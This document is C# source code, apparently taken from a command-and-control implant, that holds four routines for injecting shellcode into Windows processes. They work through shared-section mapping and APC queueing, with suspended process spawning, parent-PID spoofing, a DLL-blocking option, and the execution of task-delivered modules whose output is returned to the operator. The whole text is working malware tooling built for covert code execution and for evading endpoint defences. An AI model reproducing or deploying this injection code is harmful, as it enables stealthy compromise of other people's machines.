public static bool OpenAndInject(int pid, byte[] payload)
{
IntPtr hproc = OpenProcess(pid);
//Round payload size to page size
uint size = InjectionHelper.GetSectionSize(payload.Length);
//Crteate section in current process
IntPtr section = IntPtr.Zero;
section = InjectionHelper.CreateSection(size, Natives.PAGE_EXECUTE_READWRITE);
if (section == IntPtr.Zero)
{
return(false);
}
//Map section to current process
IntPtr baseAddr = IntPtr.Zero;
IntPtr viewSize = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, ref viewSize, Natives.PAGE_EXECUTE_READWRITE);
if (baseAddr == IntPtr.Zero)
{
return(false);
}
//Copy payload to current process section
Marshal.Copy(payload, 0, baseAddr, payload.Length);
//Map remote section
IntPtr baseAddrEx = IntPtr.Zero;
IntPtr viewSizeEx = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, hproc, ref baseAddrEx, ref viewSizeEx, Natives.PAGE_EXECUTE_READWRITE);
if (baseAddrEx == IntPtr.Zero || viewSizeEx == IntPtr.Zero)
{
return(false);
}
if (!InjectionHelper.UnMapViewOfSection(baseAddr))
{
return(false);
}
IntPtr hNtdll = Natives.LoadLibrary("ntdll.dll");
IntPtr pExitUserThread = Natives.GetProcAddress(hNtdll, "RtlExitUserThread");
long offset = pExitUserThread.ToInt64() - hNtdll.ToInt64();
IntPtr pRemoteNtdll = GetRemoteModuleBaseAddress(pid, "ntdll.dll");
IntPtr pRemoteAddress = IntPtr.Add(pRemoteNtdll, (int)offset);
IntPtr hThread = IntPtr.Zero;
Natives.NtCreateThreadEx(out hThread, 0x1FFFFF, IntPtr.Zero, hproc, pRemoteAddress, IntPtr.Zero, true, 0, 0xffff, 0xffff, IntPtr.Zero);
if (hThread == IntPtr.Zero)
{
return(false);
}
Natives.PROCESS_INFORMATION procInfo = new Natives.PROCESS_INFORMATION();
procInfo.hThread = hThread;
procInfo.hProcess = hproc;
// Assign address of shellcode to the target thread apc queue
if (!InjectionHelper.QueueApcThread(baseAddrEx, procInfo))
{
return(false);
}
InjectionHelper.ResumeThread(procInfo);
return(true);
}
public void ExecuteModuleUnManaged(bool blockdlls)
{
string output = "";
IntPtr hReadPipe = IntPtr.Zero;
IntPtr hWritePipe = IntPtr.Zero;
if (!Spawner.CreatePipe(ref hReadPipe, ref hWritePipe))
{
return;
}
Core.Natives.PROCESS_INFORMATION procInfo = new Core.Natives.PROCESS_INFORMATION();
if (blockdlls)
{
if (!Spawner.CreateProcessPCMPBNMBSAO(hReadPipe, hWritePipe, this.processname, true, ref procInfo))
{
return;
}
}
else
{
if (!Spawner.CreateProcess(hReadPipe, hWritePipe, this.processname, true, ref procInfo))
{
return;
}
}
string pipename = GetPipeName(procInfo.dwProcessId);
InjectionLoaderListener injectionLoaderListener = new InjectionLoaderListener(pipename, task);
byte[] payload = Core.Utility.DecompressDLL(Convert.FromBase64String(task.ModuleTask.Assembly));
//Round payload size to page size
uint size = InjectionHelper.GetSectionSize(payload.Length);
//Crteate section in current process
IntPtr section = IntPtr.Zero;
section = InjectionHelper.CreateSection(size, Core.Natives.PAGE_EXECUTE_READWRITE);
if (section == IntPtr.Zero)
{
return;
}
//Map section to current process
IntPtr baseAddr = IntPtr.Zero;
IntPtr viewSize = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, Core.Natives.GetCurrentProcess(), ref baseAddr, ref viewSize, Core.Natives.PAGE_READWRITE);
if (baseAddr == IntPtr.Zero)
{
return;
}
//Copy payload to current process section
Marshal.Copy(payload, 0, baseAddr, payload.Length);
//Map remote section
IntPtr baseAddrEx = IntPtr.Zero;
IntPtr viewSizeEx = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, procInfo.hProcess, ref baseAddrEx, ref viewSizeEx, Core.Natives.PAGE_EXECUTE);
if (baseAddrEx == IntPtr.Zero || viewSizeEx == IntPtr.Zero)
{
return;
}
if (!InjectionHelper.UnMapViewOfSection(baseAddr))
{
return;
}
// Assign address of shellcode to the target thread apc queue
if (!InjectionHelper.QueueApcThread(baseAddrEx, procInfo))
{
return;
}
InjectionHelper.SetInformationThread(procInfo);
InjectionHelper.ResumeThread(procInfo);
output = injectionLoaderListener.Execute(procInfo.hProcess, hReadPipe);
Core.Natives.CloseHandle(procInfo.hThread);
Core.Natives.CloseHandle(procInfo.hProcess);
SendResponse(output);
}
public static bool SapwnAndInjectPPID(string binary, byte[] payload, int ppid)
{
Natives.PROCESS_INFORMATION procInfo = new Natives.PROCESS_INFORMATION();
Natives.CreationFlags flags = Natives.CreationFlags.CREATE_SUSPENDED | Natives.CreationFlags.DETACHED_PROCESS
| Natives.CreationFlags.CREATE_NO_WINDOW | Natives.CreationFlags.EXTENDED_STARTUPINFO_PRESENT;
if (!Spawner.CreateProcess(binary, ppid, flags, ref procInfo))
{
return(false);
}
//Round payload size to page size
uint size = InjectionHelper.GetSectionSize(payload.Length);
//Crteate section in current process
IntPtr section = IntPtr.Zero;
section = InjectionHelper.CreateSection(size, Natives.PAGE_EXECUTE_READWRITE);
if (section == IntPtr.Zero)
{
return(false);
}
//Map section to current process
IntPtr baseAddr = IntPtr.Zero;
IntPtr viewSize = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, ref viewSize, Natives.PAGE_READWRITE);
if (baseAddr == IntPtr.Zero)
{
return(false);
}
//Copy payload to current process section
Marshal.Copy(payload, 0, baseAddr, payload.Length);
//Map remote section
IntPtr baseAddrEx = IntPtr.Zero;
IntPtr viewSizeEx = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, procInfo.hProcess, ref baseAddrEx, ref viewSizeEx, Natives.PAGE_EXECUTE);
if (baseAddrEx == IntPtr.Zero || viewSizeEx == IntPtr.Zero)
{
return(false);
}
if (!InjectionHelper.UnMapViewOfSection(baseAddr))
{
return(false);
}
// Assign address of shellcode to the target apc queue
if (!InjectionHelper.QueueApcThread(baseAddrEx, procInfo))
{
return(false);
}
InjectionHelper.ResumeThread(procInfo);
Natives.CloseHandle(procInfo.hThread);
Natives.CloseHandle(procInfo.hProcess);
return(true);
}
public static bool SapwnAndInject(string binary, byte[] payload)
{
Natives.PROCESS_INFORMATION procInfo = new Natives.PROCESS_INFORMATION();
if (!Spawner.CreateProcess(binary, true, ref procInfo))
{
return(false);
}
//Round payload size to page size
uint size = InjectionHelper.GetSectionSize(payload.Length);
//Crteate section in current process
IntPtr section = IntPtr.Zero;
section = InjectionHelper.CreateSection(size);
if (section == IntPtr.Zero)
{
return(false);
}
//Map section to current process
IntPtr baseAddr = IntPtr.Zero;
IntPtr viewSize = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, ref viewSize);
if (baseAddr == IntPtr.Zero)
{
return(false);
}
//Copy payload to current process section
Marshal.Copy(payload, 0, baseAddr, payload.Length);
//Map remote section
IntPtr baseAddrEx = IntPtr.Zero;
IntPtr viewSizeEx = (IntPtr)size;
InjectionHelper.MapViewOfSection(section, procInfo.hProcess, ref baseAddrEx, ref viewSizeEx);
if (baseAddrEx == IntPtr.Zero || viewSizeEx == IntPtr.Zero)
{
return(false);
}
if (!InjectionHelper.UnMapViewOfSection(baseAddr))
{
return(false);
}
// Assign address of shellcode to the target thread apc queue
if (!InjectionHelper.QueueApcThread(baseAddrEx, procInfo))
{
return(false);
}
IntPtr infoth = InjectionHelper.SetInformationThread(procInfo);
if (infoth == IntPtr.Zero)
{
return(false);
}
InjectionHelper.ResumeThread(procInfo);
Natives.CloseHandle(procInfo.hThread);
Natives.CloseHandle(procInfo.hProcess);
return(true);
}